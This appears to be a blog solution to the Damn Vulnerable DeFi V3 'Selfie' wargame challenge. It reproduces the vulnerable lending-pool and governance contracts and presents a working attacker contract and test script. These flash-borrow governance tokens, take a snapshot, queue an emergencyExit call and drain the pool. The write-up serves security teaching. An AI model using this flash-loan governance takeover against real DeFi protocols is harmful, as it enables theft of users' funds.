- Published on
Damn Vulnerable DeFi V3 - Selfie - Solution
- Authors
- Name
- Marco Besier, Ph.D.
- @marcobesier
Damn Vulnerable DeFi V3 - Selfie - Solution
Contracts
ISimpleGovernance.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface ISimpleGovernance {
struct GovernanceAction {
uint128 value;
uint64 proposedAt;
uint64 executedAt;
address target;
bytes data;
}
error NotEnoughVotes(address who);
error CannotExecute(uint256 actionId);
error InvalidTarget();
error TargetMustHaveCode();
error ActionFailed(uint256 actionId);
event ActionQueued(uint256 actionId, address indexed caller);
event ActionExecuted(uint256 actionId, address indexed caller);
function queueAction(address target, uint128 value, bytes calldata data) external returns (uint256 actionId);
function executeAction(uint256 actionId) external payable returns (bytes memory returndata);
function getActionDelay() external view returns (uint256 delay);
function getGovernanceToken() external view returns (address token);
function getAction(uint256 actionId) external view returns (GovernanceAction memory action);
function getActionCounter() external view returns (uint256);
}
SelfiePool.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol";
import "@openzeppelin/contracts/interfaces/IERC3156FlashLender.sol";
import "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
import "./SimpleGovernance.sol";
/**
* @title SelfiePool
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
*/
contract SelfiePool is ReentrancyGuard, IERC3156FlashLender {
ERC20Snapshot public immutable token;
SimpleGovernance public immutable governance;
bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan");
error RepayFailed();
error CallerNotGovernance();
error UnsupportedCurrency();
error CallbackFailed();
event FundsDrained(address indexed receiver, uint256 amount);
modifier onlyGovernance() {
if (msg.sender != address(governance))
revert CallerNotGovernance();
_;
}
constructor(address _token, address _governance) {
token = ERC20Snapshot(_token);
governance = SimpleGovernance(_governance);
}
function maxFlashLoan(address _token) external view returns (uint256) {
if (address(token) == _token)
return token.balanceOf(address(this));
return 0;
}
function flashFee(address _token, uint256) external view returns (uint256) {
if (address(token) != _token)
revert UnsupportedCurrency();
return 0;
}
function flashLoan(
IERC3156FlashBorrower _receiver,
address _token,
uint256 _amount,
bytes calldata _data
) external nonReentrant returns (bool) {
if (_token != address(token))
revert UnsupportedCurrency();
token.transfer(address(_receiver), _amount);
if (_receiver.onFlashLoan(msg.sender, _token, _amount, 0, _data) != CALLBACK_SUCCESS)
revert CallbackFailed();
if (!token.transferFrom(address(_receiver), address(this), _amount))
revert RepayFailed();
return true;
}
function emergencyExit(address receiver) external onlyGovernance {
uint256 amount = token.balanceOf(address(this));
token.transfer(receiver, amount);
emit FundsDrained(receiver, amount);
}
}
SimpleGovernance.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../DamnValuableTokenSnapshot.sol";
import "./ISimpleGovernance.sol"
;
/**
* @title SimpleGovernance
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
*/
contract SimpleGovernance is ISimpleGovernance {
uint256 private constant ACTION_DELAY_IN_SECONDS = 2 days;
DamnValuableTokenSnapshot private _governanceToken;
uint256 private _actionCounter;
mapping(uint256 => GovernanceAction) private _actions;
constructor(address governanceToken) {
_governanceToken = DamnValuableTokenSnapshot(governanceToken);
_actionCounter = 1;
}
function queueAction(address target, uint128 value, bytes calldata data) external returns (uint256 actionId) {
if (!_hasEnoughVotes(msg.sender))
revert NotEnoughVotes(msg.sender);
if (target == address(this))
revert InvalidTarget();
if (data.length > 0 && target.code.length == 0)
revert TargetMustHaveCode();
actionId = _actionCounter;
_actions[actionId] = GovernanceAction({
target: target,
value: value,
proposedAt: uint64(block.timestamp),
executedAt: 0,
data: data
});
unchecked { _actionCounter++; }
emit ActionQueued(actionId, msg.sender);
}
function executeAction(uint256 actionId) external payable returns (bytes memory) {
if(!_canBeExecuted(actionId))
revert CannotExecute(actionId);
GovernanceAction storage actionToExecute = _actions[actionId];
actionToExecute.executedAt = uint64(block.timestamp);
emit ActionExecuted(actionId, msg.sender);
(bool success, bytes memory returndata) = actionToExecute.target.call{value: actionToExecute.value}(actionToExecute.data);
if (!success) {
if (returndata.length > 0) {
assembly {
revert(add(0x20, returndata), mload(returndata))
}
} else {
revert ActionFailed(actionId);
}
}
return returndata;
}
function getActionDelay() external pure returns (uint256) {
return ACTION_DELAY_IN_SECONDS;
}
function getGovernanceToken() external view returns (address) {
return address(_governanceToken);
}
function getAction(uint256 actionId) external view returns (GovernanceAction memory) {
return _actions[actionId];
}
function getActionCounter() external view returns (uint256) {
return _actionCounter;
}
/**
* @dev an action can only be executed if:
* 1) it's never been executed before and
* 2) enough time has passed since it was first proposed
*/
function _canBeExecuted(uint256 actionId) private view returns (bool) {
GovernanceAction memory actionToExecute = _actions[actionId];
if (actionToExecute.proposedAt == 0) // early exit
return false;
uint64 timeDelta;
unchecked {
timeDelta = uint64(block.timestamp) - actionToExecute.proposedAt;
}
return actionToExecute.executedAt == 0 && timeDelta >= ACTION_DELAY_IN_SECONDS;
}
function _hasEnoughVotes(address who) private view returns (bool) {
uint256 balance = _governanceToken.getBalanceAtLastSnapshot(who);
uint256 halfTotalSupply = _governanceToken.getTotalSupplyAtLastSnapshot() / 2;
return balance > halfTotalSupply;
}
}
Solution
Before we look at the solution, let's first understand the two smart contracts involved in this challenge. SelfiePool
is a flash loan provider including an emergencyExit()
function that allows its governance contract to drain funds in emergencies. SimpleGovernance
is SelfiePool
's governance contract. It allows users to propose actions for execution if the proposal is supported by a sufficiently high number of governance token votes (at least 50% of the total supply). Additionally, proposals can only be executed after they have spent at least 2 days in the queue.
The first thing we notice is that the execution of actions includes the ability to make function calls. In other words, if we can find a way to successfully propose an action, we can have that action call the emergencyExit()
function to drain the contract.
The challenge we need to overcome is that we need at least 50% of the DVT token supply to queue such an action. To achieve this, we can simply request a sufficiently high DVT flash loan from SelfiePool
, queue the action, and pay back the loan using the following attacker contract:
SelfiePoolAttacker.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
interface IPool {
function flashLoan(
IERC3156FlashBorrower _receiver,
address _token,
uint256 _amount,
bytes calldata _data
) external returns (bool);
}
interface IGovernance {
function queueAction(address target, uint128 value, bytes calldata data) external returns (uint256 actionId);
}
interface IERC20Snapshot is IERC20 {
function snapshot() external returns (uint256 lastSnapshotId);
}
contract SelfiePoolAttacker {
address immutable player;
IPool immutable pool;
IGovernance immutable governance;
IERC20Snapshot immutable token;
uint256 constant AMOUNT = 1_500_000 * 1e18;
constructor(address _pool, address _governance, address _token){
player = msg.sender;
pool = IPool(_pool);
governance = IGovernance(_governance);
token = IERC20Snapshot(_token);
}
function attack() external {
bytes memory data = abi.encodeWithSignature("emergencyExit(address)", player);
pool.flashLoan(
IERC3156FlashBorrower(address(this)), address(token), AMOUNT, data
);
}
function onFlashLoan(address, address, uint256, uint256, bytes calldata data) external returns(bytes32) {
token.snapshot();
governance.queueAction(address(pool), 0, data);
token.approve(address(pool), AMOUNT);
return keccak256("ERC3156FlashBorrower.onFlashLoan");
}
}
After successfully registering our action proposal, the only thing left to do is to wait for (i.e., fast-forward) two days and execute our action.
selfie.challenge.js
...
it('Execution', async function () {
/** CODE YOUR SOLUTION HERE */
let attacker = await (await ethers.getContractFactory("SelfiePoolAttacker", player)).deploy(
pool.address, governance.address, token.address
)
await attacker.attack();
const ACTION_DELAY_IN_SECONDS = 2 * 24 * 60 * 60;
await time.increase(ACTION_DELAY_IN_SECONDS);
await governance.connect(player).executeAction(1);
});
...